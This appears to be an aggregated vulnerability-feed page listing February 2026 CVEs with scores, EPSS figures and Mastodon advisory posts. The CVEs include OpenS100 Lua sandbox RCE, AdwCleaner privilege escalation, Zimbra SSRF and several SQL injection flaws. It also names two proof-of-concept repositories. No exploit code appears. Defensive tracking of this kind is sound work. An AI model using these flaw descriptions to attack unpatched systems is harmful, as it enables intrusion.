OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 contain a remote code execution vulnerability via an unrestricted Lua interpreter. The Portrayal Engine initializes Lua using luaL_openlibs() without sandboxing or capability restrictions, exposing standard libraries such as 'os' and 'io' to untrusted portrayal catalogues. An attacker can provide a malicious S-100 portray

thehackerwire@mastodon.social at 2026-02-17T20:25:14.000Z ##

🔴 CVE-2026-22208 - Critical (9.6)

OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 contain a remote code execution vulnerability via an unrestricted Lua interpreter. The Portrayal Engine initializes Lua using luaL_openlibs() without sandboxing or capabi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq at 2026-02-17T16:00:13.808Z ##

🚨 CRITICAL: CVE-2026-22208 in OpenS100 (S-100 viewer) enables RCE via unsandboxed Lua. Attackers can embed malicious scripts in S-100 catalogues — risk of full system compromise. Block untrusted imports & monitor. Patch when released. radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-17T20:25:14.000Z ##

🔴 CVE-2026-22208 - Critical (9.6)

OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 contain a remote code execution vulnerability via an unrestricted Lua interpreter. The Portrayal Engine initializes Lua using luaL_openlibs() without sandboxing or capabi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-17T16:00:13.000Z ##

🚨 CRITICAL: CVE-2026-22208 in OpenS100 (S-100 viewer) enables RCE via unsandboxed Lua. Attackers can embed malicious scripts in S-100 catalogues — risk of full system compromise. Block untrusted imports & monitor. Patch when released. radar.offseq.com/threat/cve-20 #OffSeq #CVE202622208 #infosec

##

CVE-2025-67905
(8.7 HIGH)

EPSS: 0.01%

updated 2026-02-17T21:32:21

2 posts

Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an insecure log file delete operation in which the target location is user-controllable, allowing a non-admin user to escalate privileges to SYSTEM via a symbolic link, a related issue to CVE-2023-28892. To exploit this, an attacker must create a file in a given folder path and intercept the application log file deletion flo

thehackerwire@mastodon.social at 2026-02-17T20:25:04.000Z ##

🟠 CVE-2025-67905 - High (8.7)

Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an insecure log file delete operation in which the target location is user-controllable, allowing a non-admin user to escalate privileges to SYSTEM via a symbolic link, a re...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T20:25:04.000Z ##

🟠 CVE-2025-67905 - High (8.7)

Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an insecure log file delete operation in which the target location is user-controllable, allowing a non-admin user to escalate privileges to SYSTEM via a symbolic link, a re...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23648
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-17T21:32:21

2 posts

Glory RBG-100 recycler systems using the ISPK-08 software component contain multiple system binaries with overly permissive file permissions. Several binaries executed by the root user are writable and executable by unprivileged local users. An attacker with local access can replace or modify these binaries to execute arbitrary commands with root privileges, enabling local privilege escalation.

thehackerwire@mastodon.social at 2026-02-17T20:23:51.000Z ##

🟠 CVE-2026-23648 - High (7.8)

Glory RBG-100 recycler systems using the ISPK-08 software component contain multiple system binaries with overly permissive file permissions. Several binaries executed by the root user are writable and executable by unprivileged local users. An at...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T20:23:51.000Z ##

🟠 CVE-2026-23648 - High (7.8)

Glory RBG-100 recycler systems using the ISPK-08 software component contain multiple system binaries with overly permissive file permissions. Several binaries executed by the root user are writable and executable by unprivileged local users. An at...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0929
(7.5 HIGH)

EPSS: 0.03%

updated 2026-02-17T21:32:21

2 posts

The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capability checks, allowing subscribers and above to create forms on the site.

thehackerwire@mastodon.social at 2026-02-17T16:13:43.000Z ##

🟠 CVE-2026-0929 - High (7.5)

The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capability checks, allowing subscribers and above to create forms on the site.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:13:43.000Z ##

🟠 CVE-2026-0929 - High (7.5)

The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capability checks, allowing subscribers and above to create forms on the site.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0829
(5.8 MEDIUM)

EPSS: 0.02%

updated 2026-02-17T21:32:21

1 posts

The Frontend File Manager Plugin WordPress plugin through 23.5 allows unauthenticated users to send emails through the site without any security checks. This lets attackers use the WordPress site as an open relay for spam or phishing emails to anyone. Attackers can also guess file IDs to access and share uploaded files without permission, exposing sensitive information.

offseq@infosec.exchange at 2026-02-17T07:30:36.000Z ##

🔒 CVE-2026-0829 (HIGH): Frontend File Manager plugin ≤23.5 for WordPress has missing authorization, letting unauthenticated users send site emails & access files. Remove or restrict plugin use until patched! radar.offseq.com/threat/cve-20 #OffSeq #WordPress #Vuln #BlueTeam

##

CVE-2020-7796
(9.8 CRITICAL)

EPSS: 93.55%

updated 2026-02-17T21:32:16

6 posts

Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.

Nuclei template

AAKL at 2026-02-18T15:59:56.551Z ##

CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.

- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability cve.org/CVERecord?id=CVE-2008-

- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability cve.org/CVERecord?id=CVE-2020-

- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability cve.org/CVERecord?id=CVE-2026-

##

secdb at 2026-02-17T22:00:17.716Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

##

cisakevtracker@mastodon.social at 2026-02-17T21:00:59.000Z ##

CVE ID: CVE-2020-7796
Vendor: Synacor
Product: Zimbra Collaboration Suite
Date Added: 2026-02-17
Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

AAKL@infosec.exchange at 2026-02-18T15:59:56.000Z ##

CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.

- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability cve.org/CVERecord?id=CVE-2008-

- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability cve.org/CVERecord?id=CVE-2020-

- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability cve.org/CVERecord?id=CVE-2026- #CISA #vulnerability #Google #Microsoft #Zimbra #Windows

##

secdb@infosec.exchange at 2026-02-17T22:00:17.000Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441

##

cisakevtracker@mastodon.social at 2026-02-17T21:00:59.000Z ##

CVE ID: CVE-2020-7796
Vendor: Synacor
Product: Zimbra Collaboration Suite
Date Added: 2026-02-17
Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2008-0015
(8.8 HIGH)

EPSS: 80.64%

updated 2026-02-17T21:32:16

6 posts

Stack-based buffer overflow in the CComVariant::ReadFromStream function in the Active Template Library (ATL), as used in the MPEG2TuneRequest ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted web page, as exploited in th

AAKL at 2026-02-18T15:59:56.551Z ##

CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.

- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability cve.org/CVERecord?id=CVE-2008-

- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability cve.org/CVERecord?id=CVE-2020-

- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability cve.org/CVERecord?id=CVE-2026-

##

secdb at 2026-02-17T22:00:17.716Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

##

cisakevtracker@mastodon.social at 2026-02-17T21:01:30.000Z ##

CVE ID: CVE-2008-0015
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-17
Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

AAKL@infosec.exchange at 2026-02-18T15:59:56.000Z ##

CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.

- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability cve.org/CVERecord?id=CVE-2008-

- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability cve.org/CVERecord?id=CVE-2020-

- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability cve.org/CVERecord?id=CVE-2026- #CISA #vulnerability #Google #Microsoft #Zimbra #Windows

##

secdb@infosec.exchange at 2026-02-17T22:00:17.000Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441

##

cisakevtracker@mastodon.social at 2026-02-17T21:01:30.000Z ##

CVE ID: CVE-2008-0015
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-17
Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2026-1358
(9.8 CRITICAL)

EPSS: 0.15%

updated 2026-02-17T19:21:56.343000

1 posts

Airleader Master versions 6.381 and prior allow for file uploads without restriction to multiple webpages running maximum privileges. This could allow an unauthenticated user to potentially obtain remote code execution on the server.

beyondmachines1@infosec.exchange at 2026-02-17T09:01:23.000Z ##

Critical RCE Vulnerability in Airleader Master Industrial Monitoring Systems

Airleader GmbH patched a critical unauthenticated remote code execution vulnerability (CVE-2026-1358) in its Airleader Master platform that could allow attackers to upload arbitrary files and take control of the system.

**Make sure your Airleader Master is isolated from the internet and accessible only from trusted networks. Then plan a very quick update to version 6.386. If you have isolated the equipment you have a bit of breathing room, but don't forget to patch. Any isolation will be breached given enough time.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-70956
(7.5 HIGH)

EPSS: 0.06%

updated 2026-02-17T18:34:01

2 posts

A State Pollution vulnerability was discovered in the TON Virtual Machine (TVM) before v2025.04. The issue exists in the RUNVM instruction logic (VmState::run_child_vm), which is responsible for initializing child virtual machines. The operation moves critical resources (specifically libraries and log) from the parent state to a new child state in a non-atomic manner. If an Out-of-Gas (OOG) except

thehackerwire@mastodon.social at 2026-02-17T16:36:31.000Z ##

🟠 CVE-2025-70956 - High (7.5)

A State Pollution vulnerability was discovered in the TON Virtual Machine (TVM) before v2025.04. The issue exists in the RUNVM instruction logic (VmState::run_child_vm), which is responsible for initializing child virtual machines. The operation m...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:36:31.000Z ##

🟠 CVE-2025-70956 - High (7.5)

A State Pollution vulnerability was discovered in the TON Virtual Machine (TVM) before v2025.04. The issue exists in the RUNVM instruction logic (VmState::run_child_vm), which is responsible for initializing child virtual machines. The operation m...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-65753
(9.1 CRITICAL)

EPSS: 0.04%

updated 2026-02-17T18:33:00

2 posts

An issue in the TLS certification mechanism of Guardian Gryphon v01.06.0006.22 allows attackers to execute commands as root.

1 repos

https://github.com/diegovargasj/CVE-2025-65753

thehackerwire@mastodon.social at 2026-02-17T17:33:54.000Z ##

🔴 CVE-2025-65753 - Critical (9)

An issue in the TLS certification mechanism of Guardian Gryphon v01.06.0006.22 allows attackers to execute commands as root.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T17:33:54.000Z ##

🔴 CVE-2025-65753 - Critical (9)

An issue in the TLS certification mechanism of Guardian Gryphon v01.06.0006.22 allows attackers to execute commands as root.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70397
(8.8 HIGH)

EPSS: 0.03%

updated 2026-02-17T18:33:00

2 posts

jizhicms 2.5.6 is vulnerable to SQL Injection in Article/deleteAll and Extmolds/deleteAll via the data parameter.

thehackerwire@mastodon.social at 2026-02-17T17:33:35.000Z ##

🟠 CVE-2025-70397 - High (8.8)

jizhicms 2.5.6 is vulnerable to SQL Injection in Article/deleteAll and Extmolds/deleteAll via the data parameter.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T17:33:35.000Z ##

🟠 CVE-2025-70397 - High (8.8)

jizhicms 2.5.6 is vulnerable to SQL Injection in Article/deleteAll and Extmolds/deleteAll via the data parameter.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70830
(10.0 CRITICAL)

EPSS: 0.02%

updated 2026-02-17T18:33:00

2 posts

A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine of Datart v1.0.0-rc.3 allows authenticated attackers to execute arbitrary code via injecting crafted Freemarker template syntax into the SQL script field.

1 repos

https://github.com/xiaoxiaoranxxx/CVE-2025-70830

thehackerwire@mastodon.social at 2026-02-17T16:22:04.000Z ##

🔴 CVE-2025-70830 - Critical (9.9)

A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine of Datart v1.0.0-rc.3 allows authenticated attackers to execute arbitrary code via injecting crafted Freemarker template syntax into the SQL script field.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:22:04.000Z ##

🔴 CVE-2025-70830 - Critical (9.9)

A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine of Datart v1.0.0-rc.3 allows authenticated attackers to execute arbitrary code via injecting crafted Freemarker template syntax into the SQL script field.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-65716
(8.8 HIGH)

EPSS: 0.05%

updated 2026-02-17T15:32:42

4 posts

An issue in Visual Studio Code Extensions Markdown Preview Enhanced v0.8.18 allows attackers to execute arbitrary code via uploading a crafted .Md file.

jbhall56 at 2026-02-18T13:43:08.593Z ##

The security issues impact Code Runner (CVE-2025-65715), Markdown Preview Enhanced (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no identifier assigned). bleepingcomputer.com/news/secu

##

thehackerwire@mastodon.social at 2026-02-17T16:02:04.000Z ##

🟠 CVE-2025-65716 - High (8.8)

An issue in Visual Studio Code Extensions Markdown Preview Enhanced v0.8.18 allows attackers to execute arbitrary code via uploading a crafted .Md file.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

jbhall56@infosec.exchange at 2026-02-18T13:43:08.000Z ##

The security issues impact Code Runner (CVE-2025-65715), Markdown Preview Enhanced (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no identifier assigned). bleepingcomputer.com/news/secu

##

thehackerwire@mastodon.social at 2026-02-17T16:02:04.000Z ##

🟠 CVE-2025-65716 - High (8.8)

An issue in Visual Studio Code Extensions Markdown Preview Enhanced v0.8.18 allows attackers to execute arbitrary code via uploading a crafted .Md file.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2439
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-02-17T15:32:42

6 posts

Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's built-in rand function. Neither of these methods are secure, and attackers are able to guess session_ids that can grant them access to systems. Specificall

offseq at 2026-02-17T17:30:14.346Z ##

⚠️ CVE-2026-2439 (CRITICAL) in BVA Concierge::Sessions 0.8.1 – 0.8.4: Predictable session IDs due to weak randomness let attackers hijack sessions. Upgrade ASAP or use secure RNG for session IDs. radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-17T16:12:21.000Z ##

🔴 CVE-2026-2439 - Critical (9.8)

Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:01:45.000Z ##

🔴 CVE-2026-2439 - Critical (9.8)

Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-17T17:30:14.000Z ##

⚠️ CVE-2026-2439 (CRITICAL) in BVA Concierge::Sessions 0.8.1 – 0.8.4: Predictable session IDs due to weak randomness let attackers hijack sessions. Upgrade ASAP or use secure RNG for session IDs. radar.offseq.com/threat/cve-20 #OffSeq #CVE20262439 #infosec #vuln

##

thehackerwire@mastodon.social at 2026-02-17T16:12:21.000Z ##

🔴 CVE-2026-2439 - Critical (9.8)

Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:01:45.000Z ##

🔴 CVE-2026-2439 - Critical (9.8)

Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-69633
(9.8 CRITICAL)

EPSS: 0.08%

updated 2026-02-17T15:32:42

2 posts

A SQL Injection vulnerability in the Advanced Popup Creator (advancedpopupcreator) module for PrestaShop 1.1.26 through 1.2.6 (Fixed in version 1.2.7) allows remote unauthenticated attackers to execute arbitrary SQL queries via the fromController parameter in the popup controller. The parameter is passed unsanitized to SQL queries in classes/AdvancedPopup.php (getPopups() and updateVisits() functi

thehackerwire@mastodon.social at 2026-02-17T16:20:23.000Z ##

🔴 CVE-2025-69633 - Critical (9.8)

A SQL Injection vulnerability in the Advanced Popup Creator (advancedpopupcreator) module for PrestaShop 1.1.26 through 1.2.6 (Fixed in version 1.2.7) allows remote unauthenticated attackers to execute arbitrary SQL queries via the fromController ...

